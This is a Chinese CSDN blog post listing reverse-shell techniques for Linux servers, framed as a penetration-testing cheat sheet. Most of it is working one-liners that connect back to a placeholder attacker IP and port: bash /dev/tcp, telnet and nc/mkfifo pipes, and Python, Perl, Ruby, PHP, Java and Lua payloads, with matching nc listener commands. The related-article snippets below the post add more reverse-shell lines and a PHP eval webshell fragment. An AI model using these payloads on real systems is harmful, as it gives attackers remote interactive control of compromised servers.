弹shell的多种姿势小记

最新推荐文章于 2024-04-20 08:43:21 发布
最新推荐文章于 2024-04-20 08:43:21 发布
阅读量401 收藏 1
点赞数
分类专栏: Linux 文章标签: linux shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46676743/article/details/109673457
版权

弹shell的多种姿势小记

在渗透测试的过程中,当拿到webshell以后,如果目标主机是Windows主机,则是通过开3389端口在远程连接。如果目标主机是linux服务器,一般会选择反弹shell来进行操作,在这里简单总结下反弹shell常见的几种姿势。

01、

exec 0&0 2>&0

0<&196;exec 196<>/dev/tcp/your ip/port; sh <&196 >&196 2>&196

/bin/bash  -i > /dev/tcp/your ip/port 0<&1 2>&1

02、

exec 5<>/dev/tcp/your ip/port;cat <&5 | while read line; do $line 2>&5 >&5; done

03、
攻击者主机上执行监听:

nc -lvvp port

目标主机执行:

bash -i >& /dev/tcp/your ip/port 0>&1

#bash -i 打开一个交互式的bash
#>& 将标准错误输出重定向到标准输出
#/dev/tcp/your ip/port 意为调用socket,建立socket连接,其中your ip为要反弹到的主机ip,port为端口
#0>&1 标准输入重定向到标准输出,实现你与反弹出来的shell的交互

Linux shell下常用的文件描述符是:
1.标准输入 (stdin) :代码为 0 ,使用 < 或 << ;
2.标准输出 (stdout):代码为 1 ,使用 > 或 >> ;
3.标准错误输出(stderr):代码为 2 ,使用 2> 或 2>>。
另外由于不同Linux发行版之间的差异,该命令在某些系统上可能并不适用

04、
telnet反弹
攻击者主机上打开两个终端分别执行监听:

nc -lvvp 8888
nc -lvvp 8889

目标主机中执行:

telnet your ip 8888 | /bin/bash | telnet your ip 8889

监听两个端口分别用来输入和输出,其中your ip均为攻击者的ip
反弹shell成功后,在监听8888端口的终端中执行命令可以在另一个终端中看到命令执行结果。

05、

rm -f /tmp/p; mknod /tmp/p p && telnet your ip port 0/tmp/p

06、
nc反弹
攻击者主机上执行监听命令:

nc -lvvp port

目标主机上执行:

nc -e /bin/bash your ip port

若目标主机linux发行版本没有 -e 参数,还有以下几种方式:

rm /tmp/f ; mkfifo /tmp/f;cat /tmp/f | /bin/bash -i 2>&1 | nc your ip port >/tmp/f

07、
python反弹

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("your ip",port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

08、
perl反弹

perl -e 'use Socket;$i="your ip";$p=port;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

09、
ruby反弹

法一:

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("your ip","port");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

法二:

ruby -rsocket -e'f=TCPSocket.open("your ip",port).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

10、
php反弹

php -r '$sock=fsockopen("your ip",port);exec("/bin/bash -i <&3 >&3 2>&3");'

11、
java反弹
脚本如下:

public class Revs {
/**
* @param args
* @throws Exception 
*/
public static void main(String[] args) throws Exception {
    // TODO Auto-generated method stub
    Runtime r = Runtime.getRuntime();
    String cmd[]= {"/bin/bash","-c","exec 5<>/dev/tcp/your ip/port;cat <&5 | while read line; do $line 2>&5 >&5; done"};
    Process p = r.exec(cmd);
    p.waitFor();
}
}

12、
lua反弹

lua -e "require('socket');require('os');t=socket.tcp();t:connect('your ip','port');os.execute('/bin/sh -i <&3 >&3 2>&3');"

以上是几种最常见的反弹shell的方式,欢迎大家进行补充!!!

linux shell 脚本 入门到实战详解[⭐建议收藏!!⭐]
心有鸿鹄天地,不敢妄坠人间
09-28 29万+
文章目录shell 入门到实战详解[⭐建议收藏!!⭐]关于作者**作者介绍**一、shell 入门简介1.1 什么是shell1.2 shell 编程注意事项1.3 第一个shell 脚本 hello world二、shell 环境变量讲解2.1 shell 变量详解2.2 shell 系统变量 介绍2.3 shell 环境变量 介绍2.3.1 常见的系统环境变量2.4 shell 用户环境变量 介绍2.4.1 自定义shell环境变量2.4.2 echo 打印菜单栏2.4.3 shell 中彩色输出 h
shell中CommandNotFoundError Your shell has not been properly configured to use ‘conda activate‘解决方案
最新发布
weixin_43178406的博客
04-30 6万+
本文主要介绍了在Linux shell中使用conda activate出现CommandNotFoundError Your shell has not been properly configured to use 'conda activate’解决方案,希望能对使用Python的同学们有所帮助。 文章目录 1. 问题描述 2. 解决方案
shell的不同姿势
weixin_30882895的博客
07-04 66
开启日志的情况下 access.log 用burp让其转义,然后用文件包含可以执行其中代码 general_log slow.log set global slow_query_log=1; set global slow_query_log_file='D://404.php' -- 地址 select '<?php eval($_POST['404']) ...
GetShell的N种姿势
Kevin's Blog
06-09 706
文章目录一、通用web漏洞二、反序列化漏洞三、未授权访问 本文章是对获取网站控制权,操控对方电脑的所有方式的总结、仅供参考学习研究,未授权攻击别人的计算机系统都是违法行为!望君自重!!! 一、通用web漏洞 文件上传漏洞 二、反序列化漏洞 FastJson反序列化漏洞 ActiveMQ反序列化漏洞 Shiro反序列化漏洞 三、未授权访问 Spark未授权访问getshell ...
怎么弹出shell
qq_43649282的博客
08-30 142
Linux Shell
weixin_30727835的博客
08-03 722
攻击场景 Attacker:192.168.0.106 win10 Victim:192.168.2.140 kali NC 反 shell Netcat简介 俗称瑞士军刀或NC,小巧强悍,可以读写TCP或UDP网络连接,它被设计成一个可靠的后端工具,能被其它的程序或脚本直接地或容易地驱动。 同时,nc又是一个功能丰富的网络调试和开发工具,因为它可以建立你可能用到的几乎任何...
linux 简单shell
qq1187239259的博客
01-18 124
服务器端: $ nc -p 4444 -lv 客户端: $ bash -i &gt;&amp; /dev/tcp/192.168.2.1/4444 0&gt;&amp;1
shell的各种姿势
果粒程
04-23 353
利用powershell创建一个Net.Sockets.TCPClient对象,通过Socket反tcp shell,其实也是借鉴nishang中的Invoke-PowerShellTcpOneLine.ps1目标机执行((0))攻击机成功连接shell
GetShell姿势总结
CanMeng'Blog - 一个WEB安全渗透的技术爱好者
03-20 4375
0x00 什么是WebShell 渗透测试工作的一个阶段性目标就是获取目标服务器的操作控制权限,于是WebShell便应运而生。Webshell中的WEB就是web服务,shell就是管理攻击者与操作系统之间的交互。Webshell被称为攻击者通过Web服务器端口对Web服务器有一定的操作权限,而webshell常以网页脚本的形式出现。常见的WebShell使用asp、jsp和php来编写,提供了如执行系统命令、文件上传下载、数据库管理等功能。 0x01 获取WebShell的方式 获取W...
Linux shell中出现run.sh: source: not found的解决方案
热门推荐
weixin_43178406的博客
04-20 7万+
本文主要介绍了在Linux shell中出现run.sh: source: not found的解决方案,希望能对使用Linux的同学们有所帮助。 文章目录 1. 问题描述 2. 解决方案
shell实战】使用shell实现一个进度条
互联网老辛
09-22 7360
前言 之前有小伙伴留言说,有没有那种花里胡哨的东西,比如进度条,今天他来了。 思路 1. 进度条的组成 进度条由 五个字符组成: 主进度条: # 花里胡哨的转圈圈: | \ - / #号用于生成进度: | \ - / 这四个用于在百分比后面转圈 2. 进度条的进度 一共是100%, 我们按照 每次增加4%的速度往上增加, 即: 0% ,4% 8%,12%,一直到百分百。 定义i =0 ; $i*4就表示每次增加4 i 每次增加1 let i++ 每增加4% 我们就打印
shell汇总(超详细)
人无名,便可潜心练剑。
05-27 1万+
shell姿势大全,看这一篇就够啦~
linux几种方式来shell
weixin_30266829的博客
06-29 130
渗透测试linux主机的时候,能够去 shell进行交互是非常重要的 bash-i>&/dev/tcp/10.0.0.1/80800>&1bash -i :打开一个交互的bash。dev/tcp/是linux中的一个设备,打开文件相当于发出一个socket调用,建立socket连接。打开这个文件相当于 在这个socket里面传输数据,当然, 还有一个...
shell个终端窗口tty
weixin_34138255的博客
12-04 106
2019独角兽企业重金招聘Python工程师标准>>> ...
内网渗透-常用反shell方法总结
lza20001103的博客
08-28 4775
常用反shell方法总结 文章目录常用反shell方法总结前言bash反shellnc反shell1.nclinuxshell: nc -e /bin/bash 1.1.1.1 99992. 如果linux中nc没有-e参数3.nc windows下的shell:whois 反shell常见脚本反1.python2.phppowercat反shellmsf反shell 前言 bash反shell bash -i >&/dev/tcp/1.1.1.1/9999 0&gt
内网渗透-反shell的N种姿势
lza20001103的博客
04-15 1529
内网渗透-反shell的N种姿势
shell的十种姿势
安全汪
03-07 2251
bash版本: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 ,注意这个是由解析shell的bash完成,所以某些情况下不支持 perl版本: perl -e ‘use Socket;i="10.0.0.1";i="10.0.0.1";p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(co
shell的N种姿势
cainsoftware的博客
10-09 292
0x00 前言 在渗透测试的过程中,在拿到webshell以后,如果目标主机是Windows主机,则是通过开3389端口在远程连接,如果目标主机是linux服务器,一般我们都会选择反shell来进行操作。在这里总结下反shell常见的几种姿势。 0x01 Bash反 1.1 方法一 攻击者主机上执行监听: nc -lvvp port 目标主机上执行: bash -i >& /dev/tcp/x.x.x.x/port 0>&1#bash -i 打开一
shell附加课】shell脚本调试方案详解
互联网老辛
08-29 2730
文章目录前言一. shell脚本开发规范二. shell脚本调试技巧1. 使用echo +exit 命令断点调试2. 使用bash命令参数调优3. 使用 set 来调试脚本总结 前言 最近小伙伴们的脚本写的越来越长,写的长了之后就会发现三个苦恼的事情: 上面定义了变量,后面不知道变量是什么意思了; 脚本需要一遍遍的调试很麻烦; 调试脚本只能一次次的运行,查看报错很麻烦。 首先要恭喜你,当你意识到这几个问题的时候,你的脚本level又提升了一个档次,这个时候你需要考虑脚本的规范和脚本的调试方法了。 今
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值